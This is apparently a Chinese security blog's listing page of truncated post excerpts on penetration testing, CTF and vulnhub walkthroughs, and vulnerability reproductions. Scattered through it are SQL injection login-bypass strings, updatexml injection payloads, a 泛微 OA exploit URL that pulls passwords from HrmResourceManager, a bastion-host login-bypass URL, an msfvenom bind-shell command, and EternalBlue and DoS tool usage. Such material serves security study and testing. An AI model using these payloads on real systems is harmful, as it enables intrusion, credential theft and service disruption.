文章目录Less-71、fuzz2、order by3、思路一：outfile导出文件3.1、获取数据库路径3.2、读写权限测试3.3、into outfile函数3.4、写一句话木马3.5、使用工具连接3.6、注意4、思路二4.1、导出数据库名4.2、导出表名4.3、导出列4.4、导出数据Less-7 提示使用outfile函数…

MySQL延时盲注

文章目录Mysqlzhuru—延时盲注1、延时注入定义2、延时注入的函数3、判断注入4、判断数据库字符长度5、爆破数据库名6、判断当前数据库表数量7、判断表长度8、爆破表名9、猜解列10、读取数据Mysqlzhuru—延时盲注 webug靶场—延时注入 1、延时注入定义基于时间盲注的原理分析…

白捡一个存储型XSS

本文由掌控安全学院 - 杳若投稿起因利用fofa搜索时发现 org"China Education and Research Network Center" && body"/register" 任意用户注册在找到该CMS的时候发现存在任意用户注册的情况 http://xxxx.edu.cn/student/Register.ashx …

我这一生如履薄冰，你说我能走到对岸吗？

vulnhub靶场，SYMFONOS: 1

vulnhub靶场，SYMFONOS: 1 环境准备靶机下载地址：https://www.vulnhub.com/entry/symfonos-1,322/ 攻击机：kali（192.168.109.128） 靶机：SYMFONOS: 1（192.168.109.174） 下载好靶机之…

vulnhub靶场，Tomato

vulnhub靶场，Tomato 环境准备靶机下载地址：https://www.vulnhub.com/entry/tomato-1,557/ 攻击机：kali（192.168.109.128） 靶机：Tomato：（192.168.109.141） 下载好靶机之…

vulnhub靶场，DC-6

vulnhub靶场，DC-6 环境准备靶机下载地址：https://www.vulnhub.com/entry/dc-6,315/ 攻击机：kali（192.168.58.130） 靶机：DC-6（192.168.58.149） 下载好靶机之后直接使用VMware Work…

MessageSolution 邮件归档系统EEA 信息泄露(CNVD-2021-10543)

0x01 前言 MessageSolution是企业电子邮件归档软件的开发商。MessageSolution企业邮件归档管理系统EEA存在信息泄露漏洞。 0x02 漏洞影响攻击者可利用漏洞获取Windows服务器administrator hash与web账号密码等敏感信息。 0x03 fofa查询语句 title"MessageSolution E…

用友系列全漏洞检测工具

用友系列全漏洞检查工具plus版收录漏洞如下： 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞用友 U8 OA test.jsp SQL注入漏洞用友FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞用友 GRP-U8 UploadFileData 任意文件上传漏洞用友ERP-NC 目录遍…

渗透测试基础 web安全 1.0

想给我的好姐妹在19岁生日的时候送她一辆玛莎拉蒂可惜她在我心中永远18 小白入坑常见术语介绍什么是渗透测试渗透测试流程学习环境配置HTTP响应码http urlhttp头讲解HTTP请求方法错误配置HTTP 方法导致的安全事件HTTP头中安全隐患HTTPS协议这么久不回我消息你在跟谁聊天呢把…

[ 漏洞复现篇 ] Apache Shiro 身份认证绕过漏洞 (CVE-2022-32532)

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

[ vulhub漏洞复现篇 ] Apache Shiro 认证绕过漏洞（CVE-2020-1957）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末…

Vulnhub靶机billu-b0x渗透

靶机介绍官方下载地址：https://www.vulnhub.com/entry/billu-b0x,188/ 这个靶机没有flag，进入root目录就算完成，关于本地文件包含的运行环境： 靶机：网络连接方式设为桥接，IP地址：192.168.124…

vulnhub靶场，DC-2

vulnhub靶场，DC-2 环境准备靶机下载地址：https://www.vulnhub.com/entry/dc-2,311/ 攻击机：kali（192.168.58.130） 靶机：DC-2（192.168.58.145） 下载好靶机之后直接使用VMware Work…

vulnhub靶场，Me-and-My-Girlfriend-1

vulnhub靶场，Me-and-My-Girlfriend-1 环境准备靶机下载地址：https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 攻击机：kali（192.168.109.128） 靶机：Me-and-My-Girlfriend-1（192.1…

Vulnhub靶机Quaoar渗透

靶机介绍官方下载地址：https://www.vulnhub.com/entry/hackfest2016-quaoar,180/ 通过官方介绍知道了一共有三个flag 运行环境： 靶机：网络连接方式设为自动桥接，IP地址：192.168.1.84 攻击机：通网段下的ka…

Vulnhub靶机DC-4渗透

靶机介绍官方下载地址：https://www.vulnhub.com/entry/dc-4,313/ DC-4和DC-3一样都是只有一个入口和flag 运行环境： 靶机：网络连接方式设为桥接，IP地址：192.168.1.82 攻击机：通网段下的kali linux&#x…

Vulnhub靶机zico2渗透

靶机介绍官方下载地址：http://www.vulnhub.com/entry/zico2-1,210/ 目标是获取root的目录下的flag，难度是中级运行环境： 靶机：网络设为NAT模式，IP地址为：192.168.174.133 攻击机：同网段下的k…

渗透学习 Linux基础知识

你生来就值得被爱，这点你无需质疑。小白入坑学废集2Linux 介绍什么是LinuxLinux系统结构Linux常见发行版本版本问题磁盘分区表示硬盘和分区结构目录结构目录名Linux系统常用命令命令行编辑的几个辅助操作显示文件属性Linux 常见的七种文件类型命令提示符家目录是什…

渗透测试-从公有云到内网漫游RCE-反序列化-frp

0x01 前言当一个企业把他的业务放到腾讯云或阿里云等公有云的时候，其是与企业的内网是不相通的， 相当于逻辑隔离了(非物理隔离)， 如果企业信息安全做的相对较好，不暴露VPN地址或者路由器或防火墙业务， 信息收集的时候…

RCE

目录什么是RCE 远程系统命令执行远程代码执行 PIKACHU--exec"ping" 简单介绍一下命令连接符输入payload 源码分析 PIKACHU--EXEC"evel" 分析源码什么是RCE RCE(remote command/code execute) 可以直接让攻击者向后台服务器远程注入操作系统命…

vulnhub之sherlock

目录信息搜集扫描网段获取真实IP地址扫描IP地址获取服务以及开放端口信息浏览器查看网站查看页面源代码发现隐藏信息发现漏洞查看ssh服务发现线索解密摩斯电码得到密钥解密irene.mp4得到新的线索 our secret：下载地址解密得到第一个flag 暴力…

利用beef盗取浏览器cookie，并实现页面跳转

目录实验环境搭建靶场安装工具实验步骤登录网站插入恶意语句用户正常访问网站成功上线劫持用户cookie登录页面跳转实验环境 KALI kali中需要安装beef工具DVWA靶场客户端我是在本地搭的靶场，然后开两台虚拟机，一台kali当作攻击者&…

ToBeWritten之IoT移动应用漏洞利用（IOS 应用程序分析）

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

万能密码或账号登录语句

下面是记录了一些万能密码登录语句，一下均来自网络数值型万能账号 a or true # a or 1 # a or 11 # a or true – a a or 1 – a a or 11 – a 单引号字符型万能密码 a’ or true # a’ or 1 # a’ or 11 # a’ or true --a a’ or 1 – a a’ or 11…

渗透测试和CTF WEB之Burpsuite使用小技巧

渗透测试和CTF WEB之Burpsuite使用小技巧 Brupsuite，基于Java开发，集成了常见Web漏洞的模块 Proxy模块如果仅在本机使用，将Bind to address设为Loopback only；如果要让局域网里的设备使用代理，则可以设为All inter…

【漏洞复现】红帆OA iorepsavexml.aspx文件上传漏洞

漏洞描述广州红帆科技深耕医疗行业20余年，专注医院行政管控，与企业微信、阿里钉钉全方位结合，推出web移动一体化办公解决方案——iOffice20（医微云）。提供行政办公、专业科室应用、决策辅助等信息化工具，采取平台化管理模式，取代医疗机构过往多系统分散式管理，实现医…

网络安全（黑客）自学剖析

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全…

Struts2 S2-061漏洞复现(CVE-2020-17530)

0x01 漏洞描述 Struts2 会对某些标签属性(比如 id，其他属性有待寻找) 的属性值进行二次表达式解析，因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时，用户再传入一个 %{payload} 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕…

sqlilabs—less6

文章目录Less61、准备工作2、获取表名3、获取列名4、获取数据Less6 选择报错注入 1、准备工作数据库用户权限 ?id1 and updatexml(1,concat(0x7e,(select user()),0x7e),1)%23 当前数据库 ?id1 updatexml(1,concat(0x7e,(select database()),0x7e),1) 2、获取表名获…

【网络安全必看】如何提升自身WEB渗透能力？

前言 web渗透这个东西学起来如果没有头绪和路线的话，是非常烧脑的。理清web渗透学习思路，把自己的学习方案和需要学习的点全部整理，你会发现突然渗透思路就有点眉目了。程序员之间流行一个词，叫35岁危机，&#xf…

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-032（CVE-2016-3081）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末…

听劝，不要试图以编程为基础去学习网络安全

目录一、网络安全学习的误区1.不要试图以编程为基础去学习网络安全2.不要刚开始就深度学习网络安全3.收集适当的学习资料4.适当的报班学习二、学习网络安全的些许准备1.硬件选择2.软件选择3.外语能力三、网络安全学习路线第一阶段：基础操作入门第二阶段：…

渗透测试-waf fuzz绕过技巧

waf fuzz绕过技巧0x00 知己知彼常见 waf 收集SecureSphere (Imperva)西数WTS-WAF安全狗D盾腾讯云 waf阿里云云盾Web应用防火墙云锁UPUPW安全防护宝塔网站防火墙网防G01护卫神智创防火墙腾讯云玄武盾ISG0x01 waf 绕过(过狗)姿势举例SQL注入篇1.内联注释绕过2.等价替换法&#x…

应急响应处理

应急响应 What is 应急响应对应的英文是 Incident response或emergency responcse，通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。当企业发生黑客入侵、系统崩溃货其他影响业务正常运行的安全时间是，急需第一时间进行处理，使企业…

网络安全--Windows入侵排查

Windows入侵排查 Windows入侵排查思路 1、检查系统账号安全 1、查看服务器是否有弱口令，远程管理端口是否对公网开放检查方法：根据实际情况咨询相关服务器管理员，或者授权爆破2、查看服务器是狗存在可疑、新增账号检查方法：cmd输入lusrmgr.msc，查看是否有新增、可以账…

Struts2-S2-016/17

#前文# 通过该实验了解java开发流行框架struts2安全缺陷形成的原因， 掌握基本的漏洞利用及使用方法， 并能够通过代码审计给出加固方案。 #基础知识# 了解Struts2 Struts是Apache软件基金会赞助的一个Java开源项目， 通过采用JavaServlet/JSP技…

PbootCMS SQL注入漏洞

漏洞复现访问漏洞url 数据库是mysql 构造payload，条件为假时，未查到任何数据 http://x.x.x/index.php?search 1select 0页面回显构造payload，条件为真时，查询到数据 1select1文笔生疏，措辞浅薄，望各…

2023年最新网络安全入门指南，保姆级教程！啃完这篇就够了

一、网络安全学习的误区 1.不要试图以编程为基础去学习网络安全不要以编程为基础再开始学习网络安全，一般来说，学习编程不但学习周期长，且过渡到网络安全用到编程的用到的编程的关键点不多。一般人如果想要把编程学好再开始学习网络安全往…

Typora远程代码执行漏洞CVE-2023-2317

0x00 前言漏洞详情版本16.7以前的Typora中的updater/update.html存在基于DOM的XSS，可以通过加载定制的markdown文件实现任意javascript代码执行。原理分析漏洞触发点位于Typora的updater.html文件，通过特定协议typora://即可访问，同时…

WEB十大安全漏洞（OWASP Top 10）与渗透测试记录

1. 前言每年 OWASP（开放 Web 应用程序安全项目）都会发布十大安全漏洞。它代表了对 Web 应用程序最关键的安全风险的广泛共识。了解十大WEB漏洞种类并善于在渗透测试中发现漏洞是安全行业人员的基本要求。 2. OWASP TOP 10 2.1 OWASP Top10 2022 1.失…

upload-labs通关教程

upload-labs通关教程这回是我第一次写博客记录自己的通关教程废话不说开干通关教程准备环境less-1less-2less-3less-4less-5less-6less-7less-8less-9less-10less-11less12less13-less14准备环境 upload网站burpsuite火狐渗透版 less-1 首先我们发现第一关上传类型不能是p…

Vulnhub靶机m87:1渗透

靶机介绍官方下载地址：http://www.vulnhub.com/entry/m87-1,595/ 靶机难度容易，拥有两个用户，网络适配器是NAT模式自动分配IP地址运行环境靶机：网络设为NAT，IP地址：192.168.174.138 攻击机：…

sqli-labs page-1

一、前言终于通关了page-1的内容，现在做一下阶段性的总结。不做过多详细的教程，主要放 payload。需要详细思路分析前看先前的一些教程二、注入思路三、各关卡讲解 level-1 第一关经过简单测试发现是单引号注入附一下测试用例 id1 报错 i…

dvwa通关教程超详细

dvwa通关教程实验环境Brute ForcelowhignPYTHONCommand InjectionCross Site Request Forgery (CSRF)lowFile InclusionSQL InjectionSQL Injection (Blind)报错注入实验环境 burpwin10php 5.3python3 关于burpsuite全套使用教程点此 UNION 操作符用于合并两个或多个 SELECT 语…

【网络安全】记一次红队渗透实战项目

一、信息收集信息收集非常重要，有了信息才能知道下一步该如何进行，接下来将用 nmap 来演示信息收集 1、nmap 扫描存活 IP 由于本项目环境是 nat 模式需要项目 IP 地址，扫描挖掘本地的 IP 地址信息： 本机 IP 为：192…

sqlmap全套使用教程

sqlmap全套使用教程实验环境sqlmap常见指令命令使用篇实战篇布尔盲注/时间盲注-r实验环境 windows10python3.9sqlmapsqli2 sqlmap常见指令 sqlmap常用参数： 目标:必须得有 -u : 指定目标URL，sql注入点请求: 这些选项可用于指定如何连接到目标URL –…

渗透测试（侦查）一站式教程

侦察一站式教程使用 Nmap 扫描和识别服务识别 Web 应用防火墙查找web目录dirb使用 Nmap 扫描和识别服务 Nmap 可能是世界上最广泛使用的端口扫描器。他可以用于识别活动主机、扫描 TCP 和 UDP 开放端口，检测防火墙，获得运行在远程主机上的服务版本&…

永恒之蓝漏洞复现(ms17-010)

Metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasp…

文件上传之htaccess攻击

文章目录htaccess攻击htaccess攻击 htaccess—分布式配置文件（修改目录配置） .htaccess文件的作用是管理目录，可以修改目录配置，设置能上传某文件并以什么什么格式运行 **靶场：**upload-labs Pass-04 新建.htaccess…

文件上传之IIS—put漏洞

文章目录IIS put攻击1、put攻击2、存在iis put攻击的条件：3、扫描网站是否存在put攻击4、iis writer(桂林老兵)5、move转换文件类型6、注意IIS put攻击 1、put攻击 put协议，当我们浏览某个网站，访问某个资源时，如果网站存在这个…

sql注入出现两个password的原因分析

近期一直在学习sql注入，在起初使用dvwa进行练习时，爆破出来的表就有如下特点可以看到，爆出来的列名有一个user_id，一个id，一个user，一个username，两个password， 一开始我尝试使用…

[免费专栏] 汽车威胁狩猎之常用的几种威胁狩猎工具

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历汽车威胁狩猎专栏长期更新，本篇最新内容请前往： …

【漏洞复现】Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895

漏洞描述 Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。 Hikvision Intercom Broadcasting System是中国海康威视（Hikvision）公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版…

Vulnhub靶机CK-00渗透

靶机介绍官方下载地址：http://www.vulnhub.com/entry/ck-00,444/ 难度是容易的，建议使用VirtualBox运行靶机运行环境靶机：网络设为桥接，IP地址：192.168.1.90 攻击机：同网段下的kali linux，I…

红队攻防之特殊场景上线cs和msf

倘见玉皇先跪奏：他生永不落红尘本文首发于先知社区，原创作者即是本人网络拓扑图一、msf正向木马拿不出网域控shell msf生成木马 msfvenom -p windows/x64/meterpreter/bind_tcp lport4444 -f raw -o msf1.bin用msfvenom生成一个正向马传进去&…

学习渗透，刚刚入坑——————基础知识了解

今天学的很少但还是写写吧我大一咋就没觉悟提前学习，大一整整四个月的寒假就让我躺废了简单的说说我学到的知识渗透测试基础知识了解一下吧最近的瓜很多，吃的真爽，孩子真是个神奇的存在，有的人因此得到祝福，有的人直…

为什么说网络安全是风口行业？是IT行业最后的红利？

前言 “没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。网络安全行业特点 1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万&…

burpsuite入门，实用教程

一、写在前面习惯性拖博客，其实距离学习完burpsuite的基本使用已经有快一个月的时间了，还是现在才有时间写一写博客，与网络上来自五湖四海的伙伴们交流交流。顺便一提，因为一部分内容是当时一边学习一边做的笔记，一…

【CS学习笔记】1、如何搭建自己的渗透测试环境

0x00 前言第一次接触CS的时候，是有人在群里发了一个CS最新版的安装包，当时第一反应，CS ？？？ 作为小白的我，在角落里看着群里的大佬们讨论的十分起劲儿，而我这个萌新对于他们所讨论…

漏洞复现-泛微OA

泛微OAWeaverOA_V8_SqlinjectionWeaverOA_V8_Sqlinjection

锐捷云课堂主机默认口令目录遍历漏洞

输入默认账号密码admin/admin,成功登录构造payload，并访问： /pool/目录遍历漏洞： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的信息、技术或方法…

APK与小程序渗透

文章目录 APK与小程序渗透1. APK2. 小程序2.1 源代码2.2 小程序的默认下载位置 3. 安装证书3.1 openssl配置环境变量3.2 安装证书 APK与小程序渗透由于APK和小程序与服务器通信还是采用的是https协议，只是使用了加密。只要获取到了HTTP的请求报文就可以回归到Web渗…

sql 注入, 盲注

sql 注入, 盲注盲注适合在页面没有任何回显时使用. 测试页面有变化, 但是没有显示任何异常错误等信息. 情景: url: http://192.168.112.200/security/read.php?id1 服务器数据库名: learn一, boolean盲注 # 盲注可能需要一个一个字符去试探, 字符串处理函数经常会用到. 比…

UEditor .Net版本任意文件上传漏洞

UEditor .Net版本任意文件上传漏洞一、漏洞介绍 Ueditor是百度开发的一个网站编辑器，目前已经不对其进行后续开发和更新，该漏洞只存在于该编辑器的.net版本。漏洞的成因是在获取图片资源时仅检查了ContentType，导致可以绕过达到任意文件上…

Windows安全 Tips(1)

Windows安全 Tips 1. 彻底删除文件，也就是删除的文件不会出现在回收站中，而是直接被移除出去 ShiftDelete通过回收站属性进行设置： 选择第二个选项即可 2. 注册表regedit 3. 组策略编辑器gpedit.msc 4. 手动清空Windows临时文件夹在W…

XCTF 攻防世界 Reverse新手题（Hello，CTF）

XCTF 攻防世界 Reverse新手题（Hello，CTF） 首先，先利用exeinfoPE看一个附件的exe程序是多少位的，有没有加壳。发现程序是32位的，没有加壳之后便可以用IDA32打开和之前几道题的思路一样，首先还…

burp靶场--WebSockets安全漏洞

burp靶场–WebSockets安全漏洞 https://portswigger.net/web-security/websockets/what-are-websockets ### 什么是 WebSocket？ WebSocket是一种通过 HTTP 发起的双向、全双工通信协议。它们通常在现代 Web 应用程序中用于流数据和其他异步流量。在本节中&#x…

SQL 注入漏洞原理以及修复方法

漏洞名称 ：SQL注入、SQL盲注漏洞描述：所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将&…

Linux中更改用户账号和用户密码的两个命令

Linux中更改用户账号和用户密码的两个命令 1. chage命令用于更改用户账户和密码的有效期限 chage -l {{username}} //列出用户的密码信息sudo chage -M {{10}} {{username}} //使密码在10天后过期sudo chage -M -1 {{username}} //禁止该密码过期sudo chage -E {{YYYY-MM-D…

Apache Flink目录遍历漏洞通过REST API读/写远程文件（CVE-2020-17518CVE-2020-17519）

fofa搜索 app“APACHE-Flink” 漏洞编号： CVE-2020-17518，CVE-2020-17519 漏洞描述： CVE-2020-17518：通过REST API写入远程文件受影响的版本： Flink 1.5.1-1.11.2 Flink 1.5.1引入了REST API，可通过…

[车联网安全自学篇] ATTACK安全之检测 Android APN 代理

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历 0x01 前言 Android是一种基于Linux的自由及开放源代码的操作系统，主要使用于移动设备，如智能手持设备和平板电脑，由Google…

Windows系统跟网络相关的常用命令

Windows网络常用命令命令描述ipconfig /all详细的IP配置信息ipconfig /displaydns显示本地DNS缓存netstat -ano显示开放的端口（连接）netstat -anop tcp 1netstat循环netstat -an ｜findstr LISTENING显示LISTENING状态的端口route print路由…

信息收集之Google Hacking

Google HackingGoogleHacking作为常用且方便的信息收集搜索引擎工具，它是利用谷歌搜索强大，可以搜出不想被看到的后台、泄露的信息、未授权访问，甚至还有一些网站配置密码和网站漏洞等。掌握了Google Hacking基本使用方法，或许下一…

渗透学习 HTML基础

如果你不出去走走， 你就会以为这就是世界。渗透小白入坑学废集５HTML概述HTML文档结构HTML标签头部标签...标题标签...主体标签...特殊字符HTML格式标签段落标签换行标签预格式化标签列表标签标题标签字体修饰标签字体标签HTML超链接标签属性href属性tar…

vulnhub靶场，dusk

vulnhub靶场，dusk 环境准备靶机下载地址：https://www.vulnhub.com/entry/sunset-dusk,404/ 攻击机：kali（192.168.109.128） 靶机：dusk（192.168.109.180） 下载好靶机之后直接使用VM…

渗透学习漏洞分析

总不能因为这世上有人跟你道不同，你就不好好走自己的路呀小白入坑学废集7常见的漏洞分析工具NMAP端口扫描之王——NMAP主机探测端口扫描扫描端口状态TCP扫描（－sT）SYN扫描（-sS)端口扫描探测目标主机的操作系统密码破解…

使用永恒之蓝漏洞攻击电脑

关于实验环境实验步骤第一步打开终端第二步启动nmap第三步找到可以攻击的电脑第四步启动msfconsole实验环境 win7电脑一台（其中一台必须可以被永恒之蓝攻击） kali 系统电脑一台实验步骤第一步打开终端第二步启动nmap 输入一下命令 nmap -sV 19…

xss闯关记录 1-10超详细

xss挑战过关教程挑战关卡准备环境第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关准备环境首先需要一个 xss通关挑战源码需要准备一个PHPstuday 最后需要一台可以正常联网的电脑第一关没有任何保护随便一条脚本语句均可 <a hrefjavascript:/00/,ale…

beef-xss软件使用教程

beef-xss教程实验环境打开beefxss登录 dvwa难度调到low实验环境 beef-xsskali2021 打开beefxss 打开对应的网址并登录 http://192.168.2.157:3000/ui/panel然后我们回到虚拟机找到hook地址登录 dvwa难度调到low 输入好代码我们可以发送一个alert弹窗 ![(https://img-b…

「典型安全漏洞系列」03.跨站请求伪造CSRF详解

引言：CSRF（Cross-Site Request Forgery，跨站请求伪造）是一种攻击技术，通过使用用户的身份进行不诚实地操作，恶意用户可以在受害者（目标）的机器上执行一些未授权的操作。这可能会危及…

MS08-067 渗透

MS08-067 渗透这个漏洞多出名不需要过多介绍了。直接开始渗透。渗透准备 windows xp 以及kali (两者处于同一个网络中) 互相ping一下，确保可以ping通道路铺设好以后，就可以开始准备开火了。执行search ms08-067 执行use exploit/windows/smb/ms…

2021全国职业技能大赛安徽省阜阳市“网络空间安全赛项”赛题及赛题解析（超详细）

2021年中职组安徽省阜阳市“网络空间安全”赛项 2021安徽省阜阳市竞赛任务书及解析A模块基础设施设置/安全加固（200分）B模块安全事件响应/网络安全数据取证/应用安全（400分）模块C CTF夺旗-攻击（200分）模块D CTF夺旗-防御（200分）不懂的可以私信博主！2021安徽省阜阳市竞…

购买专栏请看说明①

购买专栏请看说明本专栏只发一些本人得个人意见和看法以及2021年中职组网络安全得一些思路和一些做题得看法和经验购买前记得在csdn 私信我购买后也可以发一下自己得做题得资料但是不“一定”都给也欢迎大家一起交流哦！

Kali Linux渗透测试扫描阶段常用工具Nmap（1）

扫描阶段Nmap工具的常见使用方法文章目录扫描阶段Nmap工具的常见使用方法前言一、Nmap命令结构二、命令结构简解1. 扫描选项-sS， -sT， -sU， -sA2. timing模版-T0 Paranoid-T1 Sneaky-T2 Polite-T3 Normal-T4 Aggressive-T5 Insane3. 扫描目标…

慢速DoS攻击工具slowhttptest(网站压力测试工具）

慢速DoS攻击工具slowhttptest(网站压力测试工具） slowhttptest 低带宽的应用层的慢速DoS工具，即通过与目标服务器保持长期的连接，从而将目标服务器的资源耗尽，达到DoS攻击的目的安装方法 kali中直接安装即可：sudo…

利用Python geoip2模块关联ip地址和物理位置（经纬度）

Python geoip2模块关联ip地址和物理位置（经纬度） 注意：在运行代码之前，需要先下载GeoLite2-City.mmdb这个配套的数据库，如果下载有问题的，可以直接去我的资源里下载，我已将资源上传 import ge…

齐治堡垒机_任意用户登录漏洞

fofa查询语法 app“齐治科技-堡垒机” 漏洞复现漏洞POC为 http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token1&id%5C&uid%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&loginshterm

泛微_OA_V8_SQL注入漏洞

fofa app"泛微-协同办公OA" POC http://url/js/hrm/getdata.jsp?cmdgetSelectAllId&sqlselect%201234%20as%20id EXP http://url/js/hrm/getdata.jsp?cmdgetSelectAllId&sqlselect%20password%20as%20id%20from%20HrmResourceManager MD5解码使…

Apache Solr stream.url SSRF与任意文件读取漏洞(附pythonEXP脚本)

漏洞背景 Apache Solr是一个开源的搜索服务，使用Java语言开发。 Apache Solr的某些功能存在过滤不严格，在Apache Solr未开启认证的情况下，攻击者可直接构造特定请求开启特定配置，并最终造成SSRF或文件读取漏洞。目前互联网已公开…

BUUCTF Reverse(easyre, reverse1)

BUUCTF Reverse(easyre, reverse1) easyre 这道题很简单，将文件放入exeinfoPE中看一下，是64位的，再用IDA64打开进入，直接就可以看到flag了 reverse1 先将文件解压，用exeinfoPE看一下是64位的，用IDA64打…

BUUCTF Reverse题 reverse3

BUUCTF Reverse题 reverse3 reverse3 首先，exeinfoPE查看一下，32位，用IDA32打开，找main函数，F5反编译，对伪代码进行分析： __int64 __cdecl main_0() {int v0; // eaxconst char *v1; // eaxs…

Python socket模块基本用法（服务端+客户端）

Python socket模块基本用法（服务端客户端） 服务端： import sockets1 socket.socket() #创建socket对象 s1.bind(("127.0.0.1",1234)) #绑定地址和端口 s1.listen(5) #开始监听 while 1:conn,address s1.accept()print("…

Windows系统安全获取重要信息的方法(一)

Windows系统安全获取重要信息的方法(一） 1. 系统信息（System information) C:\\>echo %DATE% %TIME% C:\\>hostname C:\\>systeminfo C:\\>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" C:\\>wmic cspro…

XCTF 攻防世界 Reverse新手题（no-strings-attached）

XCTF 攻防世界 Reverse新手题（no-strings-attached） 和之前的题目一样，先用exeinfoPE查看一下文件有没有被加壳，发现并没有加壳，并且是一个32位的elf文件接下来，直接用IDA32打开即可，先找main…

CVE-2019-0708漏洞实战

使用命令：search 0708搜索exp脚本搜索网段中主机漏洞 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 照例，show options 看一下配置设置网段set RHOSTS x.x.x.x run运行就行了使用攻击模块 use exploit/windows/rdp/cve_2019_0708_bluekee…

XCTF 攻防世界 Reverse新手题（logmein）

XCTF 攻防世界 Reverse新手题（logmein） 首先，先用exeinfoPE查看程序有无加壳，得知无壳，并且是一个elf文件，即linux下的文件利用linux的file命令来查看文件，发现是一个64位的程序接下来&#…

不安全的文件下载与上传

目录 unsafe filedownload （不安全的文件下载） 官方简介开始闯关分析源码 unsafe fileupload (不安全的文件上传) 官方概述测试流程 pikachu--unsafe fileupload--client check 源码分析 pikachu--Unsafe Fileupload --MIME type 传入不符合…

vulnhub之Durian复现过程

这个靶场还是有些难度的，我之前就试过一次了，卡在一个地方很久后面实在没办法就先放弃了。这两天学习过程中我感觉我好像突然又悟了，所以又把它掏出来，准备今天就拿下它。必拿下！ 目录信息搜集扫描网段扫描端口…

【漏洞复现】DophinPHP后台getshell

漏洞描述 DolphinPHP（海豚PHP）是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架，DolphinPHP秉承极简、极速、极致的开发理念，为开发集成了基于数据-角色的权限管理机制，集成多种灵活快速构建工具，可方便快速扩展的模块、插件、钩子、数据包。统一了模块、插件…

多层内网渗透

文章目录域渗透域渗透红日一靶场网络拓扑图实验环境 win7:web服务器公网IP：192.168.1.139内网IP：192.168.52.143 Win2008:域控内网IP：192.168.52. Win2003:域成员内网IP：192.168.52.扫描端口发现web服务，访问服…

一款功能强大的web目录扫描器专业版

dirpro 简介 dirpro 是一款由 python 编写的目录扫描器，操作简单，功能强大，高度自动化。自动根据返回状态码和返回长度，对扫描结果进行二次整理和判断，准确性非常高。已实现功能可自定义扫描线程导入url文件进…

php中strstr和stristr的区别及用法

strstr和stristr都是匹配字符串用的，但是strstr是区分大小写的，stristr是不区分大小写的。所以例如： <?php show_source(__FILE__); echo $_GET[hello]; $page$_GET[page]; while (strstr($page, "php://")) { $pagestr_repl…

【漏洞复现】CVE-2023-6848 kodbox远程命令执行

漏洞描述 kodbox 是一个网络文件管理器。它也是一个网页代码编辑器，允许您直接在网页浏览器中开发网站。您可以在基于 Linux、Windows 或 Mac 的平台上在线或本地运行 kodbox。唯一的要求是要有 PHP 5及以上。 kalcaddle kodbox 中发现漏洞，最高版本为 1.48。它已被宣布为关…

【漏洞复现】通达oa 前台sql注入

漏洞描述通达OA（Office Automation）是一款企业级协同办公软件，旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能，包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用，可以…

自学黑客/网络安全工具软件大全100套

黑客工具软件大全100套 1 Nessus：最好的UNIX漏洞扫描工具 Nessus 是最好的免费网络漏洞扫描器，它可以运行于几乎所有的UNIX平台之上。它不止永久升级，还免费提供多达11000种插件（但需要注册并接受EULA-acceptance–终端用户授权…

文件上传之iis编辑器漏洞

